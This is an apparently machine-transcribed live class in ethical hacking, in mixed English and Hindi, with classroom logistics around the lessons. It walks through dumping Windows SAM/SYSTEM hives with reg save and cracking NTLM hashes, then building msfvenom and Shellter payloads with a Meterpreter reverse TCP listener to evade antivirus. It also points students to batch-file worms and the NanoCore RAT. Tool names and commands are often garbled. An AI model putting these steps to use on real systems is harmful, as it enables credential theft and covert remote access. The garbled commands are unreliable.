This is Windows 7. One minute, hold. हेलो, हाँ मैम। नहीं, सेकंड क्लास है आज। हाँ, ज्वाइन हुआ था, लेकिन आज वो ज्वाइन नहीं करेगा। आज वो कुछ प्रॉब्लम है, उसको कल करेगा। हाँ, हरीश का ही क्लास ले रहे हैं अभी। तो इंग्लिश का है, हिंदी का है, तो कुछ बोलेगा भी ना, बोलेगा भी तो उधर से ना। ओके। संजय नहीं, अभी हरीश है। संजय आज छुट्टी पे है। ना। ठीक है, तो लिंक शेयर करिए, बोलिए लिंक जल्दी से ज्वाइन करेगा। हाँ, जल्दी से, और बोलिएगा जल्दी ज्वाइन करेगा, और मोबाइल नंबर भी। ठीक, काटिए। या हेलो, या one student will join today, okay? She will see the live sessions, okay? Here, do you remember? One second. Control F. Hello. Yeah, Harish. Yeah. Here, now I am opening Canonable tool, and after that I will, first of all I will tell you about Equinetics, okay? Okay. Here, this one is the tool, Run as Administrator. Why I'm using Equinetics tool? Why I am using Equinetics tool? Yeah, it is a web vulnerability scanner tool. It is a type of grey hat hacking. Grey hat hacking. You can also, both perform. You can perform both attacks. Black hat and white hat, both. Yeah, here is the tool. Here, first of all, you have to click on new scan, okay? After that, you have to use any website link, okay? Any website link. Here is the web, https://test.vulnerable.com. Okay, you can use anything, okay? In the place, you can use Google, Facebook, any website name, okay? After that, 1 minute. हाँ मैम, भेज दिए हैं, बस तुरंत उसको सेंड कर रहे हैं। हाँ, बस देते हैं, लिंक नहीं भेजे, बस भेज रहे हैं। हाँ, तो बस भेजेंगे तब तो मिलेगा। बोलिए कि भेज रहे हैं। क्या नाम है? ठीक है, तो प्रैक्टिकल ही दिखा रहे हैं। जय संतोष, JAYSANT TOSJAY। हाँ, इसको कॉल भी कर लेंगे। ठीक है मैम। हेलो, hello. Harish, wait for 1 minute. I am sending the link for Jaya Santosh. JAYSANTHOSH 681 gmail.com. Okay, only today he is joining. Okay, yeah, JaySantosh681 Okay, first of all you have to join. Okay, wait. Okay, any problem, Harish? Okay, wait for 1 or 2 minutes. Yeah, tell me. Yeah, in white hat hacking you can use Acunetics. Yeah, if any company get you the permission to find the vulnerability of my website, then you can use this tool. Okay, no, it is a software. And I can't understand you, tell me again. Can you write, can you write in WhatsApp? Okay. Yeah. To use Equinetics, I need my Wi-Fi adapter with monitor mode. No. You can use anything. Okay. Yeah, it is not compulsory to use your Wi-Fi adapter or anything. Okay. Because it is only scanning the website only. He is. We are waiting, but he is not joining yet. Yeah. Yeah, this is the. Here is the SQL injection. I will tell you about that. Here in module 13 we will learn about that. Okay. If you want this PDF, then I will send you. Okay. and this is the very big part, and here it will take more than 2 classes. Okay, it is the class of 3 hours. I'm calling him, okay, because one second, I have to call him. Okay, wait for 1 minute only, Harish. Okay. No, he has disconnected my call. What is the command to copy SAM and system file? Yeah. You have to give me the how to copy SAM and system file. Yeah, I'm opening my CMD. Okay, I'm opening my CMD and he didn't grant file it. लिंक क्या था? मीटिंग लैब HTTPS मीटिंग डेमो प्लस मीटिंग्स 713 6 email address Harish, hello. Yeah, Harish, send me the formula or sorry command. In chat box. No, in ch and tpw, no, you have to copy the SAM file and system file in running mode. JAYAS JAYAN. One second. JAYASANTHOSH681. Yeah, send me in chat box. Okay. Are you using Kali Linux or Windows now? Okay. Okay. Tomorrow you will use Kali Linux. Yeah, is there any problem in your Kali Linux? Okay. Hello. Yeah. Tell me. Okay. Send me the pic. What is the problem in your Kali Linux? Okay. Okay. If you if you get any problem, then you will tell me. Okay. One second, I am calling him again. Okay. Yeah, hello. Yeah, Santosh, I have sent you the link. Meeting key is 1067. One minute. I am 1067 134613. Okay, and I am conferencing your call. Okay. Is there any problem for we will use phone call for audio? Okay, I am conferencing your call. Okay, do not disconnect your phone. Okay. Yeah, we have. Yeah, Haris. 1 minute, Haris. Okay. REG save. Yeah, good. REG save HKLM/Sam. Okay. Haris, wait for 1 minute. He is joining. Okay, the session. After that, I will start. Okay. Santosh, is there any problem? Okay. Yeah. Now you have joined, and yeah. Now, can you see my desktop?
Yes.
Yeah. Now I am opening Windows 7. Okay.
Okay.
Santosh, can you see this clearly?
Okay.
Yeah. Can you see this clearly, Santosh? It is my Windows 7. Santosh?
Yes, sir.
Yeah, can you see my screen clearly? Santosh, you have to click unmute your video. Okay. You have to unmute your video. Okay. In left side, see on my desktop. Here you have to click on this.
Okay.
Yeah, you have to close your video camera.
Yes, sir.
Are you using your mobile phone? Yeah. But he has disconnected. Santosh, but you are disconnected now. He is disconnected. Okay, Harish, see here. It is taking so much time, and I have not no any time to wait this. Okay, see here. First of all, this is my Equinetics tool. Okay, I am using this tool. For web vulnerability scanner. Okay, so run as administrator. After that, yeah. So first of all, you have to click on new scan. Okay, after that you have to use any URL, any website URL. You can use anything. Okay, after that you have to click on next. You have to click only next. Okay, only next. Here status is done. Okay, after that you have to click on next, and here after finishing you have to click on finish. Okay, after hitting finish, you can see that here this will be the progress. Here, yeah, here it will ask you to write the username and password, but you will close this. Okay, here through here you can pause this. So I am pausing the result. Okay, yeah, here you can pause and resume. Here you can pause and resume the scanning result. Okay, yeah, here you can also stop this. Through this, here is the generate report. Okay, after scanning you can generate your report. Okay, but when your progress report will be 10%, then you will create the report, minimum 10%. Okay, here you can find the high level vulnerability, medium level vulnerability, low level vulnerability, and informational level vulnerability. Okay, if you find the medium level vulnerability, then click on here. Okay, after clicking here you can find the vulnerability description. After that you can find the impact of this vulnerability, and you can find how to fix this vulnerability. And in next WebPT we will learn about how to fix the vulnerability and how to exploit this vulnerability. Okay, how to exploit. Okay, yeah, if you get the high level vulnerability, then click here. Here this is the vulnerability, this type of vulnerability known as buffer overflow. We will know about in WebPT. Okay, and here you can also find the affected item, impact of the vulnerability, how to fix the vulnerability. Okay, so this tool is very important tool. Okay, and through this tool you can find many vulnerability, many scan, and you can also find the report. Okay, through here. Okay, only you have to click report, and after that when you click here, then it will create a report, and it after downloading, okay, you can see your report here. Okay, is there any problem in this website? HTTP, in HTTP. Oh, so first of all I will show you. Okay, I am closing this. It will refuse your connection. Okay, I will show you about that. Here is the proxy. Okay, if you want to run this in a computer networking, it is a part of networking. Okay, It is not a part of ethical hacking. A proxy server is a server application. It is a server application, application or appliances that acts as an immediate for request from client seeking resources from server that provides these resources. Yeah, here is the it provides varying levels of functionality, security, and privacy. Okay, proxy is used to proxy is used to secure or of your data and anything. Okay, if here is also and here is my network proxy. After go on preferences, after click here XY, after click on settings. Okay, after click on settings, then if you use manual proxy configuration, this is the network connection, sorry, network proxy. Okay, here is the network proxy, and after that when I will reload this page, then this proxy server is refusing connection. Okay, yeah, is it clear now? Yeah, but in local network you can use only local network LAN 127.0.0.1. okay, yeah, is it clear now? Yeah, here is my local proxy 127.0.0.1 and port number is 8080. It is for Bubsuit. Okay, yeah, you can change anything. Now here we will learn about Cain and Abel tool. Okay, through Cain and Abel tool, how can you find the password through SAM and system file. Okay, so before this you have to run this commands in cmd run this as administrator. What will be the command? Tell me. Here is the command. Okay, yeah, this one is the command. To copy SAM and system file, I have tell you about that. You will use this one command. Yeah, this one command, reg save hklm/sam. Yeah, reg save. Okay, after that, yeah, reg save hklm/sam /sam slash is /sam C drive. If you want to save this in C drive, then you will see column. Okay, C drive. Yeah, if you want to save this on desktop, then use desktop desktop /asm. Okay, sorry, desktop C drive SAM C column SAM. Okay, already exist. Overwrite. Yes, overwrite. Operation completed successfully. After that, if you want to save system file, then I'm using also same command, system system system. Okay, overwrite. Yes, overwrite this. Yeah, operation completed successfully. After that, close this. Control F to maximize this. After that, open C drive, computer, Open this. Here it is. Here is a C drive and here is a SAM and system file. Okay, copy this, and before this you have to delete this file. Yes, and after that paste. Okay, this one is the SAM and system file. Okay, so now again you have to run this as administrator. Yeah, after that you have to click on Cracker. Okay, you have to click on Cracker, and after that you have to click on LM and NTLM hashes. After that you have to add to list. Okay, write this. If you are getting this type of problem, then write this. Okay, after that click here, import hashes from a SAM database. Go here, this one is my SAM database file. Open this. After that click here, after that click here, click on system file. Sorry, open this, and after that you can get the key. So copy this, exit, paste it, and after that click here next. Then you can find this type of. Okay, here click on debug, click on brute force attack. After that NTLM hashes. After that I know that the password is 123. Okay, so I am using only number. Okay, minimum length is 5 or 6. Okay, anything. After that only click on start. Okay, then hashes is cracked and password is 123. Is it clear now? Yeah, now SAM file is cracked and I get the password which is 123. Okay, is there any problem? Okay, so I am closing this. If you want to download the Knative, then you can able to download this. Okay, in Windows 7 in VirtualBox. Okay, okay, you can also use this. Show me, can you share your screen? Knative, no, this is not good. Right, okay. This is another tool. John the Ripper is another tool. Okay. Okay, write in your chat box. Okay, and I am coming in 1 minute. Okay, I'm coming in 1 minute. Yeah, hello. Yeah. You can also use this to break the hash. Okay. Yeah, I have tell you about that. I didn't use this. 1 second, 1 second. It is also a password cracker. 1 second. Yeah, it is also a password cracker, and can enable is also a password cracker. Okay, but those. Okay. Yeah. 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 Is it clear now? Yeah. Now in system hacking, we have used the crack. Yeah, we have used the. 1 second, I have to see something. Yeah, in system hacking, bypass. Okay. Okay, we have used the this tool which is CHNTPW tool. CHNTPW tool. Have you used before? Okay. Yeah, many tools you can use. There is no any problem. Okay. Yes, this tool CHNTPW. This tool. But today it will work. Okay. How can? Yeah. How can you work? So first of all, here is the two file. Which one is SAM file and second one is system file. Okay. So first of all, you have to open this. Open terminal here. No. Yeah, here is the terminal, and you have to go in desktop, cd desktop. Okay. After that, you have to use CHNTPW. Yeah. Remembered? Yeah. Now we will learn about viruses. Okay. Here are some tools you can use for virus. Okay. So first of all, I have to close this PDF, and after that I will open the virus PDF. Okay. Yeah. I have tell you about that. What is virus, adware, malware? Hello. Yeah, hello. Yeah. Okay. Good. Now today we will use the tool. Okay. So first of all, you have to download this tool, NanoCore Ret. Okay. You have to download the NanoCore. If you are using two Windows, then you can use NanoCore. Okay. And first one is Worms make with Virus Maker, and second one is Shelter in Kali Linux. So I am closing this PDF, and after that I am opening. 1 second, I am opening here. Here is the two method to create a payload. Okay. First one is MSF Venom. I am telling you about that, and you have to read this command properly. Okay. Yeah. Here through Metasploit table we can get the access. Okay, through only Metasploit. Yeah. Here is the MSF Venom tool. Yeah, I have used it, so I am showing you in history. Yeah, this one is the tool. This one is the command. Yeah. Yeah, this one. Yeah, this one is the command. Okay. Yeah, I am using this slash root. Yeah, this one will be the command. Okay. Yeah, this one will be the command msf venom -p windows slash. If you want to use x86, then you can use this. If you don't want to use x86, then you can remove this. Yeah, yeah, tell me. Yeah, I am making a payload for Windows. Okay, I am creating a payload for. Here I am using this command to create a payload for Windows. Here msf venom -p will be constant. If you want to make the, yeah, if you want to make the payload of Windows, then you can use here Windows. If you want to make, yeah. After that, all this will be same, all this will be same, all this will be same. And after that, in last, if you want to make the payload of Android, then you can use .apk. Okay, you have tried this. One second, I have to use harish.exe file. This one is the exe file. Okay, now it will create the payload, but here my Windows 7, okay, can't work through this payload, so I can't execute this command. Okay, I can't execute this payload. Yeah, tell me. No, my Windows 7 is not working good, so this will not execute. Okay, but see what happened. It is creating. It is taking so much time. Can you see my screen clearly, Harish? Okay, but it is creating the payload, but it is taking so much time. Okay. Yes. Yeah, it is creating the payload, so it is taking so much time. Okay. Okay, I am stopping this, but it has hanged. It is created hurry.exe, but it has not completed. But it is not working here. Okay. Maybe my laptop will be slow. Okay. Okay, I am exiting this. Okay. Yeah, after that you have to start the database. Okay. After that you have to start the database. The command will be msfdb init. Okay, init. Okay, Yeah. Here starting database already configured. After that you have to run this MSF console. Okay. Yeah, it will open the Metasploit. Do you know about this process? Okay. So okay, good. So I am creating the payload from second method. Okay. Do you know about shelter? So you have to run the command apt-get install shelter. First of all, I will show you how it will work. Okay. After that, you can install and run this command. Okay. Through shelter, we can also make a payload. Okay. Through shelter, we can also make the payload which was not detectable by Windows 7, Windows 8 or Windows 10. Okay. Yeah. But FatRat is very good. Yeah, shelter is opened. Okay. See on my screen how it will work. Okay. Shelter is opened here. So first of all, you have to only click here A. Okay. After that, enter here PE target. You have to bind the payload in any exe file. Okay. So I am using this hurry.exe file. Okay. So use /root/desktop. Okay. Desktop. It will be the location. Yeah, it is the location of exe file. Yeah. No. This is not a type of steganography. Only binding the payload. Yeah. You can you can say that it is a type of steganography. But here only binding the page. Only binding the payload in a exe file. Okay. /root/desktop/ Yeah. Here I have used the PE target. In this file I am binding your payload. Okay. After that, hit enter. File size error. Here file size is error because file is empty or too big. Okay. So I have to select next exe file. So open within, search here any exe file. You have to search the exe file. Yeah, easy to. I am copying this. Okay. Pasting here. Paste one file. Yeah, this is a move to trash. I have to rename this. What is the command to rename this file? Through command line, only command line. MB. I'm using this. Okay. Control Shift New Terminal. Here you have to go on desktop, CD desktop. Okay. After that you have to use MB. After that VB. What is the name of this? VBS.exe. Yeah, VBS.exe. No, this file didn't appear, huh? Yeah, tell me. Yeah, rename. MB is used for rename. Okay. Here, what is the name of this? WBS. Okay, sorry. WBS. Okay, so I am changing this as a hurry. Okay, hurry.exe. Okay, is it clear? I have renamed this. You can also rename this file mvhari.exe into hr.exe. Okay, is it clear? Now see here, this file name is har.exe. Okay, now open your Shelter, and here the p target you have to use /root/desktop desktop /har.exe. Okay, this one will be the file, har.exe file. Yeah, it is creating. Yeah, press enter to continue. Yeah, continue. Yeah, created successfully. Only it will take some time. Yeah. What happened? Tell me again. Yeah, tell me in chat box. Okay. Yeah. Tell me. Yeah, tell me. After that, I will use this. Come on. Yeah. Through Python you can develop many tools. If you know Python very well, because Kali Linux is based on Python. Okay. Yeah. Okay, here use a listed payload or custom. Okay, I want to listed payload, so I am using here L. After that, here select payload by index. Which payload you want to select? Then I am using here first one, which is meterpreter _TCP. Enter. After that, you have to set lhost. Lhost will be my IP address, and here my IP address is 43.36. Okay, first of all I have to check this. Okay, after that I am ifconfig. Okay, 43.36. Okay, set L port. You can use anything. I am using 1 4 times 1 for set L port. Okay, yeah, press enter to continue. No, not available. Sorry. L1 set lhost 192.168.43.36. What is the problem? Set L port will be 1111. No available location for cell code injection or found after last stage. Okay. Here in this exe file will not work. Okay, it is, yeah, here this file is not working, so it didn't create this. Okay, so I am using again shelter. You have to use a exe file, okay, but here this exe file is not working, so you have to download the putty.exe, this one file. I am showing you putty.exe. Okay, putty.exe download here, putty.exe download. This file will run. Okay, you can download for Windows or anything. You can download putty here. Okay, and after that, when you create the payload through shelter, okay, then you have to got the connection. How can you get the connection? Through here. Okay, same to same you have to use exploit multi/handler. Okay, multi/ handler, same thing. Okay, as usual, only shelter is used to make the payload, and MSF Venom is also used to make the payload, and FatRat is also used to make the payload. Okay, shelter and FatRat is similar. Okay, if you want to install shelter, then share your screen. I will tell you about it. Okay, share your screen with me. I am not using putty.exe because my laptop was hanged when I was using this command. Okay, on Thursday. Yeah, apt-get install shelter. So use the virus and payload carefully. apt- space, don't give a space. No, I am sending you in the chat box. Okay, see here, apt-get install shelter. Yeah, I am sending you. apt-get install shelter. Okay. First of all, you have to update or upgrade your PC. After that, you can use this command. Okay. Yeah. Yes, tomorrow you will have to download the NanoCore. Okay. In Windows. Where is the command to? Not working? Okay, run the command apt-get shelter. Yeah, now enter. No, you have to update or upgrade your PC. Okay, first of all, show your source list. Okay. Oh. Okay. Yeah. One second. Yeah, I am sending you some worms. Okay, you have to use this in your notepad and save this file as a bat and dot bat. Save. I am showing you worms. WORM. Yeah, some dangerous worms. How to make worms virus. Yeah, I am sending you 1 minute. 1 minute. Dot .bbs. Yeah, also dot .bbs. How to make virus in Notepad. In Notepad. Yeah, here is the website which is known as tech2hack.com. Okay, run this website on your own risk. Okay, because it will. Here is the sum. I am sharing my screen. Okay, here in chat box I am sending you this one link. Okay, in Notepad you can make many dangerous worms. Okay, so use this carefully in Notepad. Okay, and use this in your own risk. Yeah, but don't use your PC. Use another PC. Okay, another one PC. Okay, here is the some worms through where you can make the payload. Sorry, make the worms or anything. And tomorrow you will have to download this one tool, NanoCode. Sorry, yeah, NanoCode. This is the very good tool. Okay. Yeah, in Windows. Okay, is there any problem? Okay, then continue your class tomorrow. Okay, because Sanjay is not present. If Sanjay was present, then I will teach you from 2 p.m. Okay, but